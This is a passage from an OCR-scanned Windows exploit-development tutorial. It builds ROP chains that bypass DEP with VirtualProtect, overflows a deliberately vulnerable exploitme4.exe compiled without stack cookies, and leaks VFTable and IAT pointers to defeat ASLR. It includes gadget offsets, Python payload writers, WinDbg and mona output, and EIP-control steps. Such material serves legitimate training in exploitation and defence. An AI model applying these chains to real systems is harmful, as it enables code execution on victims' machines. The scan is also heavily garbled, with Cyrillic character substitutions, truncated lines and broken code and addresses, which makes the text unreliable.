+ 0х76473, 8) 


+ Oxbfe65, ! 


vcr120 + 0x3936b, 
2 + Охргаба, # 
2 + 0xbe203, 


+ Oxbfe65, 


+ Oxbfe65, 


+ Oxbfe65, 
+ 0x3936b, 


+ Оха041с, 


+ 0x3936b, 


0 + Ox1e47e, 


132 + 0x489c0, 
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The chain of gadgets is quite convoluted, so you should take your time to understand it. You may want to 
debug it in WinDbg. Start WinDbg, load exploitme3.exe and put a breakpoint on the ret instruction of the 
main function: 


bp exploitme3!main+0x86 


Then hit F5 (go) and begin to step (F10) through the code. Use dd esp to look at the stack now and then. 


Here's a simpler description of what happens to help you understand better: 


esp += 0х24+4 # ADD ESP,24 # POP ЕВР # RETN 
# This "jumps" to "skip" 
# cmd: 


"calc" 


# ста+8: 

Ох НТ, # zeroed out at runtime 
# cmd+Och: 

WinExec 

ExitThread 
# cmd-* 14h: 


IpCmdLine # arg1 of WinExec (computed at runtime) 
uCmdShow # arg2 of WinExec 


ret for ExitT'hread # not used 
dwExitCode # arg1 of ExitThread 
# cmd+24h: 


| 
edi = esp # INC ESI # PUSH ESP # MOV EAX,EDI # POP EDI # POP ESI # POP EBP # RETN 0x04 | 


# ----> now edi = here | 


# here: 
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eax - edi # XCHG EAX,EDI # RETN 
# ----> now eax = here 
| 
eax -= 36 # SUB EAX,7 # POP EBX # POP EBP # RETN 
# SUB EAX,7 # POP EBX # POP EBP # RETN 
# SUB EAX,7 # POP EBX # POP EBP # RETN 
# SUB EAX,7 # POP EBX # POP EBP # RETN 
# SUB EAX,7 # POP EBX # POP EBP # RETN 
# SUB EAX,2 # POP ЕВР # RETN 
# INC EAX # RETN 
# ----> now eax = ста+8 (i.e. eax --> value to zero-out) 
| 
dword ptr [eax] = 0 # XOR ECX,ECX # XCHG ECX,DWORD PTR [EAX] # POP ESI # POP EBP # RETN 
| 
еах-=2 # SUB EAX,2 # POP ЕВР # RETN | 
# ----> now eax+0eh = cmd+14h (i.e. eax*Oeh --> IpCmdLine on the stack) 
| 
есх = eax # XCHG EAX,ECX # MOV EDX,653FB4A5 # RETN 
# XOR EAX,EAX # RETN 
# XOR EAX,ECX # POP EBP # RETN 0x08 


# SUB EAX,2 ft POP EBP # RETN 
# SUB ЕАХ,2 ft POP ЕВР # RETN 
# SUB EAX,2 # POP EBP # RETN 


# ----> now eax = cmd 


| 
swap(eax,ecx) # XCHG EAX,ECX # MOV EDX,653FB4A5 # RETN 


# ----> now eax+0eh = cmd+14h 


# ----> now ecx = cmd 


| 
[eax*Oeh] = ecx # MOV DWORD PTR [EAX+0EH],ECX # POP EBP # RETN 0x10 
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eax = есх # XCHG EAX,ECX # MOV EDX,653FB4A5 # RETN 
eax += 12 # ADD EAX,0C # RETN 

# ----> now eax = cmd-*Och 
esp = eax # XCHG EAX,ESP # RETN 


# This "jumps" to cmd+Och 





Disabling DEP 
It turns out that DEP can be disabled programmatically. The problem with DEP is that some applications 


might not work with it, so it needs to be highly configurable. 


At a global level, DEP can be 


AlwaysOn 


AlwaysOff 
Optin: DEP is enabled only for system processes and applications chosen by the user. 


OptOut: DEP is enabled for every application except for those explicitly excluded by the user. 


DEP can also be enabled or disabled on a per-process basis by using SetProcessDEPPolicy. 


There are various ways to bypass DEP: 


• VirtualProtect() to make memory executable. 


• VirtualAlloc() to allocate executable memory. 
Note: VirtualAlloc() can be used to commit memory already committed by specifying its address. To make 


а page executable, it’s enough to allocate a single byte (length = 1) of that page! 


HeapCreate() + HeapAlloc() + copy memory. 
SetProcessDEPPolicy() to disable DEP. It doesn't work if DEP is AlwaysOn or if 


SetProcessDEPPolicy() has already been called for the current process. 
NtSetInformationProcess() to disable DEP. It fails if DEP is AlwaysON or if the module was compiled 


with /NXCOMPAT or if the function has been already called by the current process. 


Here’s a useful table from Team Corelan: 
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(1) doesn't exist 
(2) fails because of default DEP Policy settings 





If you look at the file , you'll see that топа generated а chain for . Let’s use it! 


First of all, let’s have a look at . Its signature is as follows: 


BOOL ММАР! VirtualProtect( 
_In_ LPVOID ІрАаагеѕѕ, 
In SIZE_T dwSize, 

In DWORD flNewProtect, 
Out PDWORD IpflOldProtect 





This function modifies the protection attributes of the pages associated with the specified area of memory. 
We will use ( ). By making the portion of the stack 
containing our shellcode executable again, we can execute the shellcode like we did before. 


Here's the chain for Python built by mona: 
Python 


rop gadgets = [ 
0х6а021868, 
0х64021868, 


Ox6cf8c658, 
0x00000201, 
0х6402еаае, 
0х00000040, 
O0x6d04b6c4, 
0х77200ѓсе, 
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0x776a5b23, 
Ox6cfd8e3d, # 5 
Ox6cfde150, # 
0х77656е8ае, 
Ox6cfc0464, + 
0х640551а4, 
Охба026719, 3 
0х77157133, 

] 


PUNCTI 
return 


The idea of this chain is simple: first we put the right values in the registers and then we push all the 
registers on the stack with . As before, let's try to avoid null bytes. As you can see, this chain 
contains some null bytes. | modified the chain a bit to avoid that. 


Read the following code very carefully paying special attention to the comments: 


Python 


= 0x6cf70000 
= 0x77120000 
= 0х77630000 


= Oxffffffff 
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=| 
+ Oxbf868, 
+ Oxbf868, 


+ 0x1c658, 
0x11110511, 

+ Oxdb6c4, 
Oxeeeefeef, 
Т г120 + 0х46398, 


+ Охредае, 
0x01010144, 
ntdll + 0x75b23, 
Oxfefefeff, 
Т 120 + 0x39b41, 


120 + Oxdb6c4, 
2 + OxeOfce, 
+ 0x75b23, 

+ 0x68e3d, 
r120 + 0x6e150, 
+ 0x2e8ae, 

120 + 0x50464, 

+ Охе51а4, 

+ Oxbb7f9, 

БОХОҮ 11639), 


f write file(fi 


( 
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vrite file(r'cXname.dat') 


Here’s the main comment again: 


# After PUSHAD is executed, the stack looks like this: 


EDI (ptr to ROP NOP (RETN)) current ESP 
ESI (ptr to JMP [EAX] (EAX = address of ptr to VirtualProtect)) 

EBP (ptr to POP (skips EAX on the stack)) 

ESP (IpAddress (automatic)) 


EBX (dwSize) 

EDX (NewProtect (0x40 = PAGE EXECUTE READWRITE)) 
ECX (IpOldProtect (ptr to writeable address)) 

# EAX (address of ptr to VirtualProtect) 

# IpAddress: 

# ptrto "call esp" 


+ + жж HH HH HH + + OF 


# <shellcode> 





PUSHAD pushes on the stack the registers EAX, ECX, EDX, EBX, original ESP, EBP, ESI, EDI. The 
registers are pushed one at a time so the resulting order on the stack is reversed, as you can see in the 
comment above. 


Also note that right before PUSHAD is executed, ESP points to the last dword of the chain (ptr to 'call esp' 
[kernel32.dll]), and so PUSHAD pushes that value on the stack (ESP (IpAddress (automatic))). This value 
becomes !pAddress which is the starting address of the area of memory whose access protection attributes 
we want to change. 


Afther PUSHAD is executed, ESP points to the DWORD where ED! was pushed (see current ESP above). 
In the PUSHAD gadget, PUSHAD is followed by RET: 


msvcr120 + Oxbb7f9, # PUSHAD # RETN [MSVCR120.dll] 


This RET pops the DWORD where EDI was pushed and jumps to a NOP gadget (NOP means that it does 
nothing) which pops the DWORD where ES! was pushed and jumps to a JMP [EAX] gadget. Because EAX 
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contains the address of a pointer to VirtualProtect, that gadget jumps to VirtualProtect. Note that the stack is 
set correctly for VirtualProtect: 

EBP (ptr to POP (skips EAX on the stack)) # RET EIP 

ESP (IpAddress (automatic)) # argument 1 

EBX (dwSize) # argument 2 


EDX (NewProtect (0x40 = PAGE EXECUTE READWRITE)) # argument 3 
ECX (IpOldProtect (ptr to writeable address)) # argument 4 





When VirtualProtect ends, it jumps to the POP £ RET gadget corresponding to EBP in the scheme above 
and remove all the arguments from the stack. Now ESP points to the DWORD on the stack corresponding to 
EAX. The gadget POP # RET is finally executed so the POP increments ESP and the RET jumps to the call 
esp gadget which calls the shellcode (which сап now Бе executed). 


By now, you'll have noticed that | prefer expressing addresses as 


baseAddress * RVA 


The reason is simple: because of ASLR, the addresses change but the RVAs remain constant. 


To try the code on your PC, you just need to update the base addresses. When we'll deal with ASLR, writing 
the addresses this way will come in handy. 
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Exploitme4 (ASLR) 


Read the previous З articles if you haven't already (1, 11, IIl). 


ASLR is an acronym for Address Space Layout Randomization. As the name suggests, the layout of the 
address space is randomized, i.e. the base addresses of the PEB, the TEB and all the modules which 
support ASLR change every time Windows is rebooted and the modules are loaded into memory. This 
makes it impossible for hackers to use hard coded addresses in their exploits. There are at least two ways to 
bypass ASLR: 


1. Find some structure ог module whose base address is constant. 
2. Exploit an info leak to determine the base addresses of structures and modules. 
In this section we'll build an exploit for a little program called exploitme4.exe. 


In VS 2013, we'll disable stack cookies, but leave DEP on, by going to Project—properties, and modifying 
the configuration for Release as follows: 


• Configuration Properties 
о C/C++ 
. Code Generation 
. Security Check: Disable Security Check (/GS-) 


Make sure that DEP is activated: 


• Configuration Properties 
o Linker 
. Advanced 
. Data Execution Prevention (DEP): Yes (INXCOMPAT) 


Here’s the code of the program: 
С++ 


#include <cstdio> 
#include <conio.h> 


Name { 
ame[32]; 
[5 


Name() : ptr( пате) {} 


char *getNameBuf() ( return name; ) 
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for (int i = 0; i < 
пате = 


FILE *f = fopen(filePath, "rb"); 


f (1 


return 0; 
fseek(f, OL, SEEK END); 
long bytes - ftell(f); 
fseek(f, OL, SEEK SET); 
fread(name, 1, bytes, f); 
fclose(f); 
return 1; 


1 
Ў 


/oid printNamelnHex() { 
пате) / 4; ++i) 
X", ptr[i]); 


int main() ( 
Name name; 


(true) { 
name.readFromFile("c 
return -1; 
name.printName(); 
name.printNamelnHex(); 


This program is similar to the previous ones, but some logic has been moved to a class. Also, the program 
has a loop so that we can exploit the program multiple times without leaving the program. 


The vulnerability is still the same: we can overflow the buffer (inside the class ), but this time we 
can exploit it in two different ways: 


1. The object is on the stack so, by overflowing its property ‚ We сап control of 
so that when returns our shellcode is called. 
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2. By overflowing the property name of the object name, we can overwrite the property ptr which is used 
in the function printNamelnHex(). By controlling ptr we can make printNamelnHex() output 32 bytes of 
arbitrary memory. 


First of all, let's see if we need to use an info leak to bypass ASLR. Load exploitme4.exe in WinDbg (article), 
put a breakpoint on main() with 


bp exploitme4!main 


and hit F5 (go). Then let's list the modules with mona (article): 


0:000> !py mona modules 
Hold on... 
[+] Command used: 


Іру mona.py modules 


[*] Processing arguments and criteria 
- Pointer access level : X 

[+] Generating module info table, hang on... 
- Processing modules 


- Done. Let's rock 'n roll. 


Base | Тор | Size | Rebase | SafeSEH | ASLR | NXCompat | OS DII | Version, Modulename & Path 


0х77090000 | 0х7709а000 | 0х0000а000 | False | True | True | True | 6.1.7601.18768 [LPK.dll] (C:\Windows\s 
yswow64\LPK.dll) 


0х747с0000 | 0х7481а000 | 0х0005а000 | False | True |True | True |True | 8.0.0.4344 [guard32.dll] (C:\Windows\S 
ysWOW64\guard32.dll) 


0х76890000 | 0х7695с000 | 0х000сс000 | False | True |True | True | True |6.1.7601.18731 [MSCTF.dll] (C\Window 
s\syswow64\MSCTF.dIl) 


0x74e90000 | 0x74ed7000 | 0x00047000 | False | True | True | True | True |6.1.7601.18409 [KERNELBASE. dll] (C: 
\Windows\syswow64\KERNELBASE.dll) 


0x747b0000 | 0x747b9000 | 0х00009000 | False | True |True | True | True |6.1.7600.16385 [VERSION.dIl] (C:\Wind 
ows\SysWOW64\VERSION.dIl) 
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0x747a0000 | 0x747a7000 | 0x00007000 | False | True 
ysWOW64\fitlib.dll) 


Охтбааоооо | 0x76b6d000 | 0x0009d000 | False | True 
ows\syswow64\USP 10.dll) 


0x01390000 | 0x01396000 | 0x00006000 | False | True 


0x74f90000 | 0x75020000 | 0x00090000 | False | True 
\syswow64\GD132.dll) 


0x76320000 | 0x76430000 | 0x00110000 | False | True 
ws\syswow64\kernel32.dll) 


0х755е0000 | 0x7568c000 | 0x000ac000 | False | True 
s\syswow64\msvert.dll) 


0х74а40000 | 0х74а4с000 | 0х0000с000 | False | True 
\Windows\syswow64\CRYPTBASE.dll) 


0х74а50000 | 0x74ab0000 | 0x00060000 | False | True 
s\syswow64\SspiCli.dll) 


0x770c0000 | 0x77240000 | 0x00180000 | False | True 


0х766с0000 | 0х76с60000 | Охообаоооо | False | True 
dows\syswow64\ADVAPI32.dll) 


0х764с0000 | 0х76560000 | 0х00010000 | False | True 
ws\syswow64\RPCRT4.dll) 


Охбс910000 | Охбсаде000 | 0х000ее000 | False | True 
ws\SysWOW64\MSVCR120.dll) 


0x755a0000 | 0x755b9000 | 0x00019000 | False | True 
ws\SysWOW64\sechost.dll) 


0x76980000 | 0x76985000 | 0x00005000 | False | True 
ws\syswow64\PSAPI.DLL) 


0x76790000 | 0x76890000 | 0x00100000 | False | True 
ws\syswow64\USER32.dll) 


0x74d00000 | 0x74d60000 | 0x00060000 | False | True 
wsISysWOW6AIMM32.DLL) 


[+] This топа.ру action took 0:00:00.110000 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True |6.1.7600.16385 [fltlib.dll] (C:\Windows\S 
| True |1.626.7601.18454 [USP10.dll] (C:\Wind 


| False | -1.0- [exploitme4.exe] (exploitme4.exe) 


| True | 6.1.7601.18577 [GDI32.dll] (C:\Windows 


| True | 6.1.7601.18409 [kernel32.dll] (C:\Windo 


| True | 7.0.7601.17744 [msvert.dll] (C\Window 


| True | 6.1.7600.16385 [CRYPTBASE.dll] (C: 


| True |6.1.7601.18779 [SspiCli.dll] (C:\Window 


| 6.1.7601.18247 [ntdll.dll] (ntdll.dll) 
| 6.1.7601.18247 [ADVAPI32.dll] (C:\Win 


| True 


| True 


| True | 6.1.7601.18532 [RPCRT4.dll] (C:\Windo 


| True | 12.0.21005.1 [MSVCR120.dll] (C:\Windo 


| True | 6.1.7600.16385 [sechost.dll] (C:\Windo 


| True | 6.1.7600.16385 [PSAPI.DLL] (C:\Windo 


| True | 6.1.7601.17514 [USER32.dll] (C:\Windo 


| 6.1.7601.17514 [IMM32.DLL] (C:\Windo 





As we Can see, all the modules support ASLR, so we'll need to rely on the info leak we discovered in 


exploitme4.exe. 
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Through the info leak we'll discover the base addresses of kernel32.dll, ntdll.dll and msvcr120.dll. To do this, 
we first need to collect some information about the layout of exploitme4.exe and the three libraries we're 
interested in. 


.next section 


First of all, let’s determine the RVA (i.e. offset relative to the base address) of the .text (i.e. code) section of 
exploitme4.exe: 


0:000> !dh -s exploitme4 


SECTION HEADER #1 
.text name 
AAC virtual size 
1000 virtual address 
СОО size of raw data 
400 file pointer to raw data 
0 file pointer to relocation table 
0 file pointer to line numbers 
0 number of relocations 
0 number of line numbers 
60000020 flags 
Code 


(no align specified) 


Ехесше Read 


SECTION HEADER #2 
data name 

79C virtual size 

2000 virtual address 

800 size of raw data 

1000 file pointer to raw data 
0 file pointer to relocation table 
0 file pointer to line numbers 
0 number of relocations 


0 number of line numbers 
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40000040 flags 


Initialized Data 
(по align specified) 
Read Only 





As we can see, the КМА is . This information will come in handy soon. 


Virtual Functions 


The class has two | апа . This means that ћаза 
used to са the two virtual functions. Let's see how this works. 


In (Object-Oriented Programming), classes can be specialized, i.e. a class can derive from another 
class. Consider the following example: 
С++ 


#define USE MATH DEFINES 
include <cmath> 
#include <cstdio> 


class Figure { 
public: 

virtual double getArea() = 0; 
y; 


class Rectangle : public Figure ( 
double base, height; 


public: 
Rectangle(double base, double height) : base(base), height(height) () 


virtual double getArea() { 
irn base * height; 


Қ 


class Circle : public Figure 4 
double radius; 


public: 
Circle(double radius) : radius(radius) () 


virtual double getArea() { 
turn radius “М РІ; 


Б 


int main() ( 
Figure *figures[] = { new Rectangle(10, 5), new Circle(1.5), new Rectangle(5, 10) | 
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for (Figure *f : figures) 
printf("area: %lf\n", f->getArea()); 


irn 0; 





The classes Rectangle and Circle inherit from the class Figure, i.e. a Rectangle is a Figure and a Circle is a 
Figure. This means that we can pass a pointer to a Rectangle or a Circle where a pointer to a Figure is 
expected. Note that Figure has no implementation for the method getArea(), but Rectangle and Circle 
provide their own specialized implementations for that function. 


Have a look at the main() function. First three Figures (two Rectangles and a Circle) are allocated and their 
pointers are put into the array figures. Then, for each pointer f of type Figure *, f->getArea() is called. This 
last expression calls the right implementation of getArea() depending on whether the figure is a Rectangle or 
a Circle. 


How is this implemented in assembly? Let's look at the for loop: 


for (Figure "f : figures) 

010910AD 8D 74 24 30 lea esi,[esp+30h] 

010910B1 89 44 24 38 mov dword ptr [esp+38h],eax 

010910B5 BF 03 000000 тоу edi,3 

010910BA 8D ЭВ 00 00 0000 lea ebx,[ebx] 

010910С0 8B ОЕ mov ecx,dword ptr [esi] 
printf("area: п", f->getArea()); 

010910C2 8B 01 mov eax,dword ptr [ecx] 

010910C4 8B 00 mov eax,dword ptr [eax] 

010910C6 FF DO call eax 

010910C8 83 EC 08 sub езр,8 

010910CB DD 1C 24 fstp qword ptr [esp] 

010910CE 68 18 21 09 01 push 1092118h 

010910D3 FF D3 call ebx 

010910D5 83 C4 0C ааа евр,0Сһ 

010910D8 8D 76 04 lea esi,[esi*4] 

010910DB 4F dec еа! 

010910DC 75 E2 jne main+0A0h (010910COh) 


return 0; 
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The interesting lines are the following: 





010910С0 8B OE mov ecx,dword ptr [esi] // ecx = ptr to the object 
printf("area: “%lf\n", f->getArea()); 
010910C2 8B 01 mov eax,dword ріг [ecx]  // eax = ptr to the VFTable 
010910C4 8B 00 mov eax,dword ptr [eax] // eax = ptr to the getArea() implementation 
010910C6 FF DO call eax 
Each object starts with a pointer to the associated . All the objects of type point to the 
same VFTable which contains а pointer to the implementation of associated with . The 
objects of type point to another VFTable which contains a pointer to their own implementation of 


. With this additional level of indirection, the same assembly code calls the right implementation of 
for each object depending on its type, i.e. on its VFTable. 


A little picture might help to clarify this further: 


Rectangle Rectangle 
VTable 


ЕЕ Rectangle::getArea() 
vMethod1 ^ ^*^ 

base ET 202 

height 

Rectangle 

VFTptr | —— — 


base 
height 


Circle Circle 


VTable | 
МЕТЕ | =» . Сігае::деїАгеа() 


EINE vMethod1 





Let’s get back to . Load it in WinDbg, put a breakpoint on and hit (step) until 
you're inside the (look at the source code). This makes sure that the object has been 
created and initialized. 


The layout of the object is the following: 
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IVFTptr | name | ptr | 


<DWORD> <-- 32 bytes --> <DWORD> 





As we said before, the Virtual Function Table pointer is at offset 0. Let's read that pointer: 


0:000» dd name 

0033f8b8 01142140 0033f8e8 01141290 0114305c 
0033f8c8 01143060 01143064 00000000 0114306c 
0033f8d8 6ca0cc79 0033f8bc 00000001 0033f924 
0033f8e8 011413a2 00000001 00574fb8 00566120 
00331818 155a341e 00000000 00000000 7efde000 
0033f908 00000000 0033f8f8 00000022 0033f960 
0033f918 011418f9 147dee12 00000000 0033f930 
0033f928 7633338a 7efde000 0033f970 770f9f72 





The VFTptr is 0x011421a0. Now, let's view the contents of the VFTable: 


0:000» dd 011421a0 

011421а0 01141000 01141020 00000048 00000000 
01142160 00000000 00000000 00000000 00000000 
011421с0 00000000 00000000 00000000 00000000 
01142140 00000000 00000000 00000000 00000000 
011421e0 00000000 01143018 01142310 00000001 
011421f0 53445352 9c20999b 431fa37a cc3e54bc 
01142200 da01c06e 00000010 755с3а63 73726573 
01142210 7569665с 5с646е68 75636164 746еб564 





We have one pointer for printName() (0x01141000) and another for printNamelnHex() (0x01141020). Let's 
compute the RVA of the pointer to printName(): 


0:000> ? 01141000-exploitme4 


Evaluate expression: 4096 - 00001000 





IAT 


The IAT (Import Address Table) of a file PE is a table which the OS loader fills in with the addresses of the 
functions imported from other modules during the dynamic linking phase. When а program wants to call ап 
imported function, it uses a CALL with the following form: 
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CALL "Тој ко ptr ds:/location іп ІАТ] 


By inspecting the IAT of exploitme4.exe we can learn the base addresses of the modules the functions are 
imported from. 


First let's find out where the IAT is located: 


0:000? !dh -f exploitme4 


File Type: EXECUTABLE IMAGE 
FILE HEADER VALUES 
14C machine (i386) 
5 number of sections 


550DA390 time date stamp Sat Mar 21 18:00:00 2015 


0 file pointer to symbol table 
0 number of symbols 
EO size of optional header 
102 characteristics 
Executable 


32 bit word machine 


OPTIONAL HEADER VALUES 
10B magic £ 
12.00 linker version 
СОО size of code 
1000 size of initialized data 
0 size of uninitialized data 
140A address of entry point 
1000 base of code 


00ас0000 image base 
1000 section alignment 


200 file alignment 





http://expdev-kiuhnm.rhcloud.com 





- 155 - 





3 subsystem (Windows CUI) 
6.00 operating system version 
0.00 image version 
6.00 subsystem version 
6000 size of image 
400 size of headers 
0 checksum 
00100000 size of stack reserve 
00001000 size of stack commit 
00100000 size of heap reserve 
00001000 size of heap commit 
8140 DLL characteristics 
Dynamic base 
МХ compatible 
Terminal server aware 
of 0] address of Export Directory 
23C4[ 3C] address of Import Directory 
4000[ 1Е0] address of Resource Directory 
of 0] address of Exception Directory 
of 0] address of Security Directory 
5000 [ 1B4] address of Base Relocation Directory 
20E0[ 38] address of Debug Directory 
Of 0] address of Description Directory 
of 0] address of Special Directory 


Of 0] address of Thread Storage Directory 


40] address of Load Configuration Directory 
Of 0] address of Bound Import Directory 

B8] address of Import Address Table Directory < 
Of 0] address of Delay Import Directory 
Of О] address of COR20 Header Directory 


of 0] address of Reserved Directory 
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The RVA of the IAT is 0x2000 and its size is 0xB8 bytes. Now we can display the contents of the IAT by 
using the command dps which displays the addresses with the associated symbols: 


0:000> dps ехройте4 +2000 1В8/4 

00ас2000 76334a25 кете!3 2 зребиддегРгезеп 621600) Кегпе!32 

00ас2004 77094495 ntdll!RtIDecodePointer 

00ac2008 763334c9 kernel32!GetSystemTimeAsFileTimeStub msvcr120 
00ac200c 76331420 kernel32!GetCurrentThreadldStub 

00ас2010 763311f8 kernel32! GetCurrentProcessldStub 

00ac2014 763316f1 kernel32!QueryPerformanceCounterStub 

00ac2018 7710107b ntdll!RtlEncodePointer 

00ac201c 763351fd kernel32!IsProcessorFeaturePresent 

00ас2020 00000000 | 

00ac2024 6ca94ced MSVCR120! XocptFilter [f:\dd\vctools\crt\crtw32\misc\winxfltr.c @ 195] <---+ 
00ас2028 6ca6bb8d MSVCR120! amsg exit [f:\dd\vctools\crt\crtw32\startup\crtOdat.c @ 485] 
00ac202c бса1е25# MSVCR120!  getmainargs [f\dd\vctools\crt\crtw32\dllstufficrtlib.c @ 142] 
00ас2030 бса1с7се МЗУСК120! set app type [f:\dd\vctools\crt\crtw32\misc\errmode.c @ 94] 
00ac2034 6ca24293 MSVCR120lezit [f:\dd\vctools\crt\crtw32\startup\crtO0dat.c @ 416] 

00ac2038 6ca6bbb8 MSVCR120!_ exit [f:\dd\vctools\crt\crtw32\startup\crt0dat.c @ 432] 

00ac203c 6ca24104 MSVCR120!_ cexit [f:\dd\vctools\crt\crtw32\startup\crt0dat.c @ 447] 

00ас2040 6ca955eb MSVCR120!_ configthreadlocale [f:\dd\vctools\crt\crtw32\misc\wsetloca.c @ 141] 
00ac2044 6ca6b9e9 MSVCR120! setusermatherr [f:\dd\vctools\crt\fpw32\tran\matherr.c @ 41] 
00ac2048 6ca0cc86 MSVCR120! initterm e [f:\dd\vctools\crt\crtw32\startup\crt0dat.c @ 990] 
00ac204c 6ca0cc50 MSVCR120! initterm [f:\dd\vctools\crt\crtw32\startup\crt0dat.c @ 941] 
00ac2050 6cacf62c MSVCR120!  initenv 

00ас2054 6cacf740 MSVCR120! fmode 

00ac2058 6c9fec80 MSVCR120!type_info::~type_info [f:\dd\vctools\crt\crtw32\eh\typinfo.cpp @ 32] 
00ас205с 6ca8dc2c MSVCR120!terminate [f:\dd\vctools\crt\crtw32\eh\hooks.cpp @ 66] 

00ас2060 6calc7db MSVCR120! _crtSetUnhandledExceptionFilter [f:\dd\vctools\crt\crtw32\misc\winapisupp.c @ 194] 
00ac2064 6c9fedd7 MSVCR120!_lock [f:\dd\vctools\crt\crtw32\startup\mlock.c @ 325] 

00ac2068 6c9fedfc MSVCR120!_ unlock [f:\dd\vctools\crt\crtw32\startup\mlock.c @ 363] 

О0ас206с бса01208 MSVCR120!_calloc_crt [f\dd\vctools\crt\crtw32\heap\crtheap.c @ 55] 
00ас2070 бса0са46 М5УСК120! _ dllonexit [f:\dd\vctools\crt\crtw32\misc\onexit.c @ 263] 





http://expdev-kiuhnm.rhcloud.com 





- 157 - 





EXPLOIT DEVELOPMENT COMMUNITY 


00ac2074 6ca1be6b MSVCR120!_ onexit [f:\dd\vctools\crt\crtw32\misc\onexit.c @ 81] 

00ac2078 6ca9469b MSVCR120! invoke watson [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 121] 

00ас207с бса1с965 MSVCR120!_controlfp_s [f:\dd\vctools\crt\fow32\tran\contrlfp.c @ 36] 

00ac2080 6ca02aaa MSVCR120! except һапаіег4 common [f:\dd\vctools\crt\crtw32\misc\i386\chandler4.c @ 260] 
00ас2084 6ca96bb8 MSVCR120! сц debugger hook [f:\dd\vctools\crt\crtiw32\misc\dbghook.c @ 57] 
00ас2088 бса9480с MSVCR120!__crtUnhandledException [f:\dd\vctools\crt\crtw32\misc\winapisupp.c @ 253] 
00ac208c 6ca947f7 MSVCR120! crtTerminateProcess [f:\dd\vctools\crt\crtw32\misc\winapisupp.c @ 221] 
00ac2090 6c9fed74 MSVCR120!operator delete [f:\dd\vctools\crt\crtw32\heap\delete.cpop @ 20] 

00ас2094 бса9215с MSVCR120!_getch [f:\dd\vctools\crt\crtw32\lowio\getch.c @ 237] 

00ac2098 бса049е MSVCR120!fclose [f:\dd\vctools\crt\crtw32\stdio\fclose.c @ 43] 

О0ас209с бса1#бс MSVCR120!fseek [f:\dd\vctools\crt\crtw32\stdio\fseek.c @ 96] 

00ac20a0 6ca1f9de MSVCR120!ftell [f:\dd\vctools\crt\crtw32\stdio\ftell.c @ 45] 

00ac20a4 6ca05a8c MSVCR120!fread [f:\dd\vctools\crt\crtw32\stdio\fread.c @ 301] 

О0ас20а8 бса714с4 MSVCR120!fopen [f:\dd\vctools\crt\crtw32\stdio\fopen.c @ 124] 

О0ас20ас бсасї638 MSVCR120! соттоде 

00ас2050 6ca72fd9 MSVCR120!printf [f:\dd\vctools\crt\crtw32\stdio\printf.c @ 49] 

00ac20b4 00000000 





We just need three addresses, one for each module. Now let's compute the RVAs of the three addresses: 


0:000» ? kernel32!IsDebuggerPresentStub-kernel32 
Evaluate expression: 84517 = 00014225 

0:000»? ? ntdll!'RtlDecodePointer-ntdll 

Evaluate expression: 237013 = 00039dd5 

0:000» ? MSVCR120! XcptFilter-msver120 
Evaluate expression: 675053 - 000a4ced 





So ме know the following: 


@exploitme4 + 00002000 kernel32 + 00014а25 
@exploitme4 + 00002004 пїаїї + 00039dd5 


@exploitme4 + 00002024 msvcri20 + 000a4ced 





The first line means that at address exploitme4 + 00002000 there is kernel32 + 00014a25. Even if 
exploitme4 and kernel32 (which are the base addresses) change, the RVAs remain constant, therefore the 
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table is always correct. This information will be crucial to determine the base addresses of кегпе!32.011, 
ntdll.dll and msvcr120.dll during the exploitation. 


Popping up the calculator 
As we've already seen, the layout of the object name is the following: 


IVFTptr | name | ptr | 


<DWORD> <-- 32 bytes --> <DWORD> 





This means that ptr is overwritten with the dword at offset 32 in the file name.dat. For now we'll ignore ptr 
because we want to take control of EIP. 


First of all, notice that the object name is allocated on the stack, so it is indeed possible to overwrite ret eip 
by overflowing the property name. 


Since we must overwrite ptr on the way to take control of EIP, we must choose the address of a readable 
location for ptr or exploitme4 will crash when it tries to use ptr. We can overwrite ptr with the base address of 
kernel32.dll. 


Fire up IDLE and run the following Python script: 
Python 


vi en(r'cAname.dat', мр") as f: 
readable = struct.pack('«l', 0x76320000) 


adable + "100 





Load exploitme4 in WinDbg, hit F5 (go) and in exploitme4's console enter 'n' to exit from main() and trigger 
{Пе ехсерйоп: 

(4.2234): Access violation - code с0000005 (first chance) 

First chance exceptions are reported before апу exception handling. 

This exception may be expected and handled. 

eax-00000000 ерх-00000000 есх=6са92195 ейх=0020е0е8 еѕі=00000001 edi-00000000 

еір=62626262 esp-001cf768 ебр=62626262 юр!=0 nv up ei pl zr na pe nc 

с5=0023 ss-002b ds-002b es-002b fs-0053 gs-002b efl=00010246 

62626262 ?? 22? 





We can see that EIP was overwritten by 4 of our “b“s. Let's compute the exact offset of the dword that 
controls EIP by using a special pattern: 


0:000» !py mona pattern create 100 


Hold on... 
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[+] Command used: 


Іру mona.py pattern create 100 


Creating cyclic pattern of 100 bytes 


Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbOAb 1Ab2Ab3Ab4Ab5AbG6Ab7Ab8Ab9AcOAc1AC2AC3ACAACSACOAC7 АСВАСОА(0 
Ad1Ad2A 


[+] Preparing output file 'pattern.txt' 
- (Re)setting logfile d:\WinDbg_logs\exploitme4\pattern.txt 
Note: don't copy this pattern from the log window, it might be truncated ! 


It's better to open d:\WinDbg_logs\exploitme4\pattern.txt and copy the pattern from the file 


[+] This топа.ру action took 0:00:00.030000 





Here’s the updated script: 
Рућоп 


dat', 'wb') as f: 
Ж(<, 0х76320000) 
(‘Aa0Aa1Aa2Aa3Aa4Aad5Aab6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6'+ 
; b/AbBAb9AcOAc1 аии 1Аа2А”) 
а%32 + re jattern 
e) 





Repeat the process in WinDbg to generate another exception: 


(Е3с.2364): Access violation - code с0000005 (first chance) 

First chance exceptions are reported before апу exception handling. 

This exception may be expected and handled. 

еах-00000000 ерх-00000000 есх=6са92195 edx-001edf38 еѕі=00000001 edi-00000000 
еір=33614132 esp-0039f9ec ебр=61413161 iopl=0 nv up ei pl zr na pe nc 

cs=0023 ss-002b ds-002b es=002b fs=0053 gs=002b efl=00010246 

33614132 ?? 22? 





Let's find out the offset of 0x33614132: 


0:000> !py mona pattern offset 33614132 
Hold оп... 


[+] Command used: 


Іру топа.ру pattern offset 33614132 
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Looking for 2Aa3 in pattern of 500000 bytes 
- Pattern 2Aa3 (0x33614132) found in cyclic pattern at position 8 
